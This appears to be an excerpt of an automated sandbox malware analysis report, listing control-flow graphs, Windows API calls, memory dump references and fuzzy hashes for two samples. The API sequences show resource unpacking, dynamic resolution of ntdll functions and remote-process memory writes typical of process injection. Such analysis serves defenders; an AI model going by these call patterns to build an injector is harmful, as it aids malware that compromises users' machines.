          • Executed
          • Not Executed
          control_flow_graph 260 40197e-40199f FindResourceW 261 4019a1-4019ad LoadResource 260->261 262 4019ec-4019fd 260->262 261->262 263 4019af-4019bb LockResource 261->263 263->262 264 4019bd-4019d6 SizeofResource call 4021cf 263->264 264->262 267 4019d8-4019e5 call 40175d 264->267 267->262
          APIs
          • FindResourceW.KERNEL32(?,004030D0,00404010,00000005,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010), ref: 00401995
          • LoadResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019A5
          • LockResource.KERNEL32(00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019B0
          • SizeofResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019C1
            • Part of subcall function 004021CF: GetProcessHeap.KERNEL32(00000001,00000000,?,?,004012E9,?,00000000), ref: 004021E0
            • Part of subcall function 004021CF: RtlReAllocateHeap.NTDLL(00000000,?,004012E9,?), ref: 004021E7
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: Resource$Heap$AllocateFindLoadLockProcessSizeof
          • String ID:
          • API String ID: 1207618237-0
          • Opcode ID: 82362be20bf79ad3a806fdbf45ede37e26acfe5a6560597d6579467c307b7f7d
          • Instruction ID: 557254ad5bb932fc15fb17dcc554cf472b057d7683eb25dad1ea30e16e9c6f88
          • Opcode Fuzzy Hash: 82362be20bf79ad3a806fdbf45ede37e26acfe5a6560597d6579467c307b7f7d
          • Instruction Fuzzy Hash: 70016DB6500209AFDB116F95DD49C9B7FEDEF85390B014026F904A7261DB75CD10DAA4

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 273 401a00-401a36 call 402217 276 401a38-401a3c 273->276 277 401a5d-401a78 GetCurrentProcess call 402230 273->277 278 401a42-401a57 call 402217 276->278 279 401d96-401d9d 276->279 277->279 284 401a7e-401a9a call 40175d call 402262 277->284 278->277 278->279 284->279 289 401aa0-401ab5 284->289 290 401ab7 289->290 291 401b1d-401b25 289->291 294 401aba-401ac4 290->294 292 401be3-401bfc call 401920 291->292 293 401b2b-401b41 call 401920 291->293 303 401c02-401c06 292->303 304 401ca4 292->304 293->292 302 401b47 293->302 297 401ac6 294->297 298 401ac9-401ae1 call 402230 294->298 297->298 298->279 309 401ae7-401af9 call 401724 298->309 306 401bda-401bdd 302->306 307 401c20-401c25 303->307 308 401c08-401c0b 303->308 310 401ca6-401caf 304->310 306->292 311 401b4c-401b5a 306->311 307->303 314 401c27-401c3f call 401920 LoadLibraryA 307->314 308->307 312 401c0d-401c10 308->312 328 401afb-401b0b call 40175d 309->328 329 401b0e-401b1b 309->329 315 401cb5-401cb8 310->315 316 401d37-401d48 call 4021cf 310->316 317 401bd7 311->317 318 401b5c-401b71 311->318 312->307 319 401c12-401c15 312->319 314->279 340 401c45-401c5a call 401920 314->340 323 401cbb-401cc2 315->323 316->279 338 401d4a-401d51 316->338 317->306 324 401b73-401b94 call 401920 318->324 325 401b96-401b9a 318->325 319->307 326 401c17-401c1a 319->326 331 401cc4-401cc9 323->331 332 401ced-401cf2 323->332 351 401bcc 324->351 336 401b9c-401bc8 call 401920 325->336 337 401bcf-401bd5 325->337 326->307 326->310 328->329 329->291 329->294 341 401ccb-401cda 331->341 342 401cdc-401ceb 331->342 333 401cf4-401d03 332->333 334 401d05-401d11 332->334 343 401d12-401d26 call 402262 333->343 334->343 336->351 337->317 337->318 346 401d53-401d61 338->346 347 401d64-401d6b 338->347 356 401c92-401c96 340->356 341->343 342->343 343->279 359 401d28-401d35 343->359 346->347 347->316 353 401d6d-401d71 347->353 351->337 353->279 355 401d73-401d8f 353->355 355->279 360 401c98-401c9f 356->360 361 401c5c 356->361 359->316 359->323 360->303 362 401c65-401c71 call 401920 361->362 363 401c5e-401c63 361->363 365 401c74-401c80 GetProcAddress 362->365 363->365 365->279 368 401c86-401c8f 365->368 368->356
          APIs
            • Part of subcall function 00402217: VirtualAlloc.KERNEL32(?,?,00002000,00000040,?,00401A2C,?,?,00000040), ref: 00402228
          • GetCurrentProcess.KERNEL32 ref: 00401A5D
          • LoadLibraryA.KERNEL32(00000000), ref: 00401C34
          • GetProcAddress.KERNEL32(?,-00000002), ref: 00401C78
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: AddressAllocCurrentLibraryLoadProcProcessVirtual
          • String ID:
          • API String ID: 1706446071-0
          • Opcode ID: a757be1230ef48e252645761d69d8fbcfb748e54fb3ffc4dc49cb9433704e5ab
          • Instruction ID: f4295e59616e0c3e6cd5edc76b93a1a71782363d032a2b2cb433a1441056ac4c
          • Opcode Fuzzy Hash: a757be1230ef48e252645761d69d8fbcfb748e54fb3ffc4dc49cb9433704e5ab
          • Instruction Fuzzy Hash: 08C159B290020AAFDB15DFA5C941AAEB7B1FF44304F14843AE905F73A1E738E950CB58

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 369 402200-402216 GetProcessHeap RtlFreeHeap
          APIs
          • GetProcessHeap.KERNEL32(00000001,?,?,00401716,?,00404010,004030D0), ref: 00402208
          • RtlFreeHeap.NTDLL(00000000,?,00401716), ref: 0040220F
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: Heap$FreeProcess
          • String ID:
          • API String ID: 3859560861-0
          • Opcode ID: 1ad682c2bc064c6ee563e0fc36cebef234042c1de7907c32db52925004f6e00b
          • Instruction ID: 3f82cfca929447c2423f285c963da9d02604547df1f6ca588c548235f25897ba
          • Opcode Fuzzy Hash: 1ad682c2bc064c6ee563e0fc36cebef234042c1de7907c32db52925004f6e00b
          • Instruction Fuzzy Hash: 97B09B71044208FBDF001FD1ED0D9857F2CD784751F004010F70DA5061C672905057B5
          Memory Dump Source
          • Source File: 00000000.00000002.1797576745.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4c0000_55ryoipjfdr.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction ID: 4a86277733598b947d8066d824c8b141af3b2c0e47adec0c4fe9157b2c99f2ba
          • Opcode Fuzzy Hash: 7cb60aa3ca57c834e55298138eb6fcc60219c6ce3e155163db882c0b84b65934
          • Instruction Fuzzy Hash: 9841C37A200114EFDB90EF25C845F6AB7A9EF84728F15411EF90587312CB79EC02CBA8
          Memory Dump Source
          • Source File: 00000000.00000002.1797595291.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4d0000_55ryoipjfdr.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
          • Instruction ID: 31f64e078e16c23c75c0016aac51ff5174006e73be8b022303a88c39e4a3253d
          • Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
          • Instruction Fuzzy Hash: 16E0EC31110040CFCB599F10D560754B761FB48329F3489AF98018A392C77AD843DE04
          Memory Dump Source
          • Source File: 00000000.00000002.1797576745.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_4c0000_55ryoipjfdr.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
          • Instruction ID: 115fea4dec8eb7a936207d33841ac552b93e08d964ea89f98b2748460457861c
          • Opcode Fuzzy Hash: 2d612ec0191f637075e5dd3c2021567e28a03859e370f7c7a2e24b6ec4edea73
          • Instruction Fuzzy Hash: 2EE01235110080CFCB999F10D554B54B771FB4C329F3488AED8018A2A2C77BD943DF04
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 73831ec2ff739793e298d5e07f7047441f28691174952ee5d245ad5f7f4e6b47
          • Instruction ID: fd647da119ca351f97259c219fa55e2f7eca6b9f771cdf8039c6ae643ee10250
          • Opcode Fuzzy Hash: 73831ec2ff739793e298d5e07f7047441f28691174952ee5d245ad5f7f4e6b47
          • Instruction Fuzzy Hash: 52D09578311200CFC34ACB08C0A4E00B3B2FB88360B0AC0A5E8088B326C338EC42CE00

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 156 401da0-401dd8 call 4012c4 call 40197e 161 4021a1-4021a5 156->161 162 401dde-401df6 call 40137f 156->162 163 4021b0-4021b4 161->163 164 4021a7-4021af call 402200 161->164 169 401df8 162->169 170 401e1a-401e1e 162->170 164->163 171 401e03-401e18 call 402217 169->171 172 401dfa-401e01 169->172 173 401e24-401e37 call 402217 170->173 174 40219f-4021a0 170->174 171->170 179 401e3d-401e54 call 402230 171->179 172->170 172->171 173->174 173->179 174->161 182 402187-40218a 179->182 183 401e5a-401e76 call 40175d call 402262 179->183 182->174 184 40218c-40219c call 40227b 182->184 191 402176-402184 call 40227b 183->191 192 401e7c-401e90 183->192 184->174 191->182 193 401e92 192->193 194 401ef8-401f07 192->194 198 401e95-401e9f 193->198 196 401fc4-401fcd 194->196 197 401f0d-401f23 call 401920 194->197 201 401fd3-401fe1 196->201 202 40205c-4020a8 call 402249 196->202 197->196 210 401f29 197->210 203 401ea1 198->203 204 401ea4-401ebd call 402230 198->204 207 401fe6-401fed 201->207 215 40213e-402143 202->215 218 4020ae-4020e4 call 40175d call 40184a 202->218 203->204 214 401ec3-401ed4 call 401724 204->214 204->215 211 402012-402017 207->211 212 401fef-401ff4 207->212 219 401fbc-401fbe 210->219 216 402027-402030 211->216 217 402019-402025 211->217 220 402004-402010 212->220 221 401ff6-402002 212->221 233 401ed6-401ee6 call 40175d 214->233 234 401ee9-401ef6 214->234 215->191 224 402145-40214e 215->224 222 402031-402046 call 402262 216->222 217->222 252 4020e6-402114 218->252 253 40212f-40213b call 40227b 218->253 219->196 225 401f2e-401f3c 219->225 220->222 221->222 222->215 243 40204c-40205a 222->243 224->191 229 402150 224->229 231 401fb9 225->231 232 401f3e-401f53 225->232 236 402153-402174 call 40227b 229->236 231->219 238 401f55-401f79 call 401920 232->238 239 401f7b-401f7f 232->239 233->234 234->194 234->198 236->191 254 401fae 238->254 240 401fb1-401fb7 239->240 241 401f81-401fac call 401920 239->241 240->231 240->232 241->254 243->202 250 401fe3 243->250 250->207 252->253 259 402116-402128 CloseHandle * 2 252->259 253->215 254->240 259->253
          APIs
            • Part of subcall function 0040197E: FindResourceW.KERNEL32(?,004030D0,00404010,00000005,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010), ref: 00401995
            • Part of subcall function 0040197E: LoadResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019A5
            • Part of subcall function 0040197E: LockResource.KERNEL32(00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019B0
            • Part of subcall function 0040197E: SizeofResource.KERNEL32(?,00000000,?,?,?,004016C0,00000000,00000000,0000000A,?,?,00000005,00404010,004030D0), ref: 004019C1
          • CloseHandle.KERNEL32(?), ref: 00402119
          • CloseHandle.KERNEL32(?), ref: 00402122
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: Resource$CloseHandle$FindLoadLockSizeof
          • String ID: $(
          • API String ID: 1682351807-1344310856
          • Opcode ID: 65a453dfd5797acd4c3d41f45ab134a026913e42f1bed54af7ed45313be9213e
          • Instruction ID: fc5637a745242155f9a0eda71b2bee8bcc1150329e4d7c6693cfa44899756f19
          • Opcode Fuzzy Hash: 65a453dfd5797acd4c3d41f45ab134a026913e42f1bed54af7ed45313be9213e
          • Instruction Fuzzy Hash: 8ED17BB1D0020AABCB10DFE5CA85AAEB7B5FF44304F14453EEA15B72D1D778AA50CB58

          Control-flow Graph

          APIs
          • GetProcessHeap.KERNEL32(00000001,00000000,?,?,004012E9,?,00000000), ref: 004021E0
          • RtlReAllocateHeap.NTDLL(00000000,?,004012E9,?), ref: 004021E7
          • GetProcessHeap.KERNEL32(00000001,?,?,004012E9,?,00000000), ref: 004021F1
          • RtlAllocateHeap.NTDLL(00000000,?,004012E9), ref: 004021F8
          Memory Dump Source
          • Source File: 00000000.00000002.1797418914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.1797399833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797439026.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797470753.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1797485945.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_55ryoipjfdr.jbxd
          Similarity
          • API ID: Heap$AllocateProcess
          • String ID:
          • API String ID: 1357844191-0
          • Opcode ID: 239206a3bbee07e605adba3626eef336eeec1ddccb8c5aef048af63f72fbc125
          • Instruction ID: 99da3122b59a98e68878367fefeeb420ab35424323341d48a4e97cca11a21ddc
          • Opcode Fuzzy Hash: 239206a3bbee07e605adba3626eef336eeec1ddccb8c5aef048af63f72fbc125
          • Instruction Fuzzy Hash: BED06272044208FBDF101FD0EE0DB993B6DAB84726F40C025BB0DB54A1C7B591519B69

          Execution Graph

          Execution Coverage:27.6%
          Dynamic/Decrypted Code Coverage:100%
          Signature Coverage:0%
          Total number of Nodes:21
          Total number of Limit Nodes:1
          execution_graph 428 7c007e 429 7c0083 428->429 441 7c05bd VirtualAlloc 429->441 431 7c0093 432 7c00a4 VirtualProtect VirtualProtect 431->432 436 7c00dc 432->436 433 7c012c 442 7c01c0 433->442 435 7c00f3 VirtualProtect 435->436 437 7c0122 VirtualProtect 435->437 436->433 436->435 436->437 437->436 438 7c0136 439 7c0187 VirtualFree 438->439 440 7c018f 439->440 441->431 443 7c0243 442->443 446 7c01d0 442->446 443->438 444 7c01f5 VirtualProtect 444->446 445 7c0232 VirtualProtect 445->446 446->443 446->444 446->445 447 7b0000 448 7b000a 447->448 449 7b0030 448->449 450 7b0054 VirtualAlloc 448->450

          Callgraph

          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10002058
          • NtAllocateVirtualMemory.NTDLL ref: 100020C2
          • NtAllocateVirtualMemory.NTDLL ref: 10002144
          • NtWriteVirtualMemory.NTDLL ref: 100021AC
          • NtProtectVirtualMemory.NTDLL ref: 10002219
          • NtAllocateVirtualMemory.NTDLL ref: 100022BF
          • NtAllocateVirtualMemory.NTDLL ref: 10002307
          • NtFreeVirtualMemory.NTDLL ref: 1000236D
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$Allocate$FreeProtectWrite
          • String ID: 0$@
          • API String ID: 2341880195-1545510068
          • Opcode ID: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
          • Instruction ID: 8a67cd01151eb9b4bc0707442a35890dfe94f4f8c30553d2cc09ea552f4a7a1d
          • Opcode Fuzzy Hash: f87315e85e7ea5ee04e93949c62e377effce1a32d370792e8fe14f822cac0e62
          • Instruction Fuzzy Hash: 1052B976210B9186EB21CF26E89478E37A5FB48BD8F414216EE8D87B5CDF38C695C740
          APIs
          • LdrLoadDll.NTDLL(?,?,?,?,?,?,?,?,10001A56), ref: 1000110F
          • LdrLoadDll.NTDLL ref: 10001160
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: Load
          • String ID: LdrGetProcedureAddress$LdrLoadDll$MultiByteToWideChar$NtAllocateVirtualMemory$NtClearEvent$NtClose$NtCreateEvent$NtDuplicateObject$NtFreeVirtualMemory$NtProtectVirtualMemory$NtQueryInformationProcess$NtReadVirtualMemory$NtResumeThread$NtSignalAndWaitForSingleObject$NtWriteVirtualMemory$kernel32.dll$kernelbase.dll$ntdll.dll
          • API String ID: 2234796835-2271829017
          • Opcode ID: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
          • Instruction ID: f45f7f1c08eb91b97991e6554cebb749e452b6f3a0b67de9b4da0f7efa5bb01d
          • Opcode Fuzzy Hash: ed3c4db63ad5cc4b42f47faa611067c77233abd1438de0ab5415474ad8deb5a1
          • Instruction Fuzzy Hash: AE7138B5201B4182EA06DB15B8513DA63E1FB887C4F86A439FA8D4732CEFBCD596C744
          APIs
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: CloseCreateDuplicateEventFreeMemoryObjectVirtual
          • String ID:
          • API String ID: 2195376797-0
          • Opcode ID: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
          • Instruction ID: ec56d51781d27893633d9c7240a3277deb896bb74b027171511855976fde94cd
          • Opcode Fuzzy Hash: 125e384b1580ac73084a014f6f5d19768dab637254859a7a07da6fbda5995ce6
          • Instruction Fuzzy Hash: 5BA14476314B5086E721CF65E89078E33B5FB48BD9F404216EE8D87A58EF79D0A9C780
          APIs
          • NtReadVirtualMemory.NTDLL ref: 10003264
          • NtAllocateVirtualMemory.NTDLL ref: 100032C6
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$AllocateRead
          • String ID: @$H
          • API String ID: 3289415595-104103126
          • Opcode ID: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
          • Instruction ID: dea1a02c564d3dd13500935e78af13ab2823ce8030b56d528f9cdc6a1a59fef7
          • Opcode Fuzzy Hash: 45b0df9b2760fa00ff26ba3f8ced848685c82d721b20d44215791ef4f5557619
          • Instruction Fuzzy Hash: E3515672701B818AEB61CF65E480B8E73B9FB48BD8F508116EE9D57A58DF38C15AC740
          APIs
          • NtReadVirtualMemory.NTDLL ref: 100034A2
          • NtWriteVirtualMemory.NTDLL ref: 10003534
          • NtClearEvent.NTDLL ref: 10003554
          • NtSignalAndWaitForSingleObject.NTDLL ref: 10003568
          • NtReadVirtualMemory.NTDLL ref: 1000359A
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$Read$ClearEventObjectSignalSingleWaitWrite
          • String ID: H$H$H
          • API String ID: 295313806-1989617792
          • Opcode ID: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
          • Instruction ID: 5021ed8a1ce9b19b5c1717e875882b8ce5ca7f80513f570afed245be05e02f97
          • Opcode Fuzzy Hash: 3ca87656067ffe8b229c32908ea08fee09abe8ed5b1d66e628708bdb819a434f
          • Instruction Fuzzy Hash: 3E310A76315B8196EB628F25E94078A73A4F7887D5F405125DF8D83B18EF39C5A9CB00
          APIs
          • NtAllocateVirtualMemory.NTDLL ref: 10002FCF
          • NtAllocateVirtualMemory.NTDLL ref: 1000304E
          • NtReadVirtualMemory.NTDLL ref: 1000319D
          • NtFreeVirtualMemory.NTDLL ref: 100031ED
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryVirtual$Allocate$FreeRead
          • String ID: @
          • API String ID: 1625299726-2766056989
          • Opcode ID: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
          • Instruction ID: 08cac392a7a719ba5502d424389b33665d87b9a1454d0d325e88c27c51f30f16
          • Opcode Fuzzy Hash: 0f366e26a0798a30fde1c151075a89e6975462614e01b7bf4b65f50e877308c2
          • Instruction Fuzzy Hash: 1E713776705A809AE712CF61E8507DE77B9F748BCCF008426EE8A97A18DF39C159C740
          APIs
          • MultiByteToWideChar.KERNEL32 ref: 10002CF3
          • NtAllocateVirtualMemory.NTDLL ref: 10002D8F
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: AllocateByteCharMemoryMultiVirtualWide
          • String ID: @
          • API String ID: 2538853753-2766056989
          • Opcode ID: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
          • Instruction ID: 616015141f86b4411b04d895360121dff96872f804a9fadd55d9b66df03b3043
          • Opcode Fuzzy Hash: 6db13f651ae0562452465d8fcef45ca460b0c7a57652c6155d982de570f98954
          • Instruction Fuzzy Hash: 1E610776204B8186E721DF21E89039E77B8F7887D8F504126EE8D87A2CDF79C599CB00
          APIs
          • NtQueryInformationProcess.NTDLL ref: 1000160F
          • NtReadVirtualMemory.NTDLL ref: 10001644
          • NtReadVirtualMemory.NTDLL ref: 100016AB
          • NtReadVirtualMemory.NTDLL ref: 100016F1
          Strings
          Memory Dump Source
          • Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
          • Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
          • Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd
          Similarity
          • API ID: MemoryReadVirtual$InformationProcessQuery
          • String ID: @
          • API String ID: 2292840443-2766056989
          • Opcode ID: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
          • Instruction ID: 13bcebea3263881b6e9f5070fea06d859024c12457ffc486f15f1268fdda5df8
          • Opcode Fuzzy Hash: 1586ad8fb1f5eced5170f8237ecfd31ce70e54e35ace2cb357b905d546dd4cf7
          • Instruction Fuzzy Hash: 9B31D7B2618BD191E7B19B15F8447CEB368F788BC9F854125DB8943A48DF3DC186CB04

          Control-flow Graph

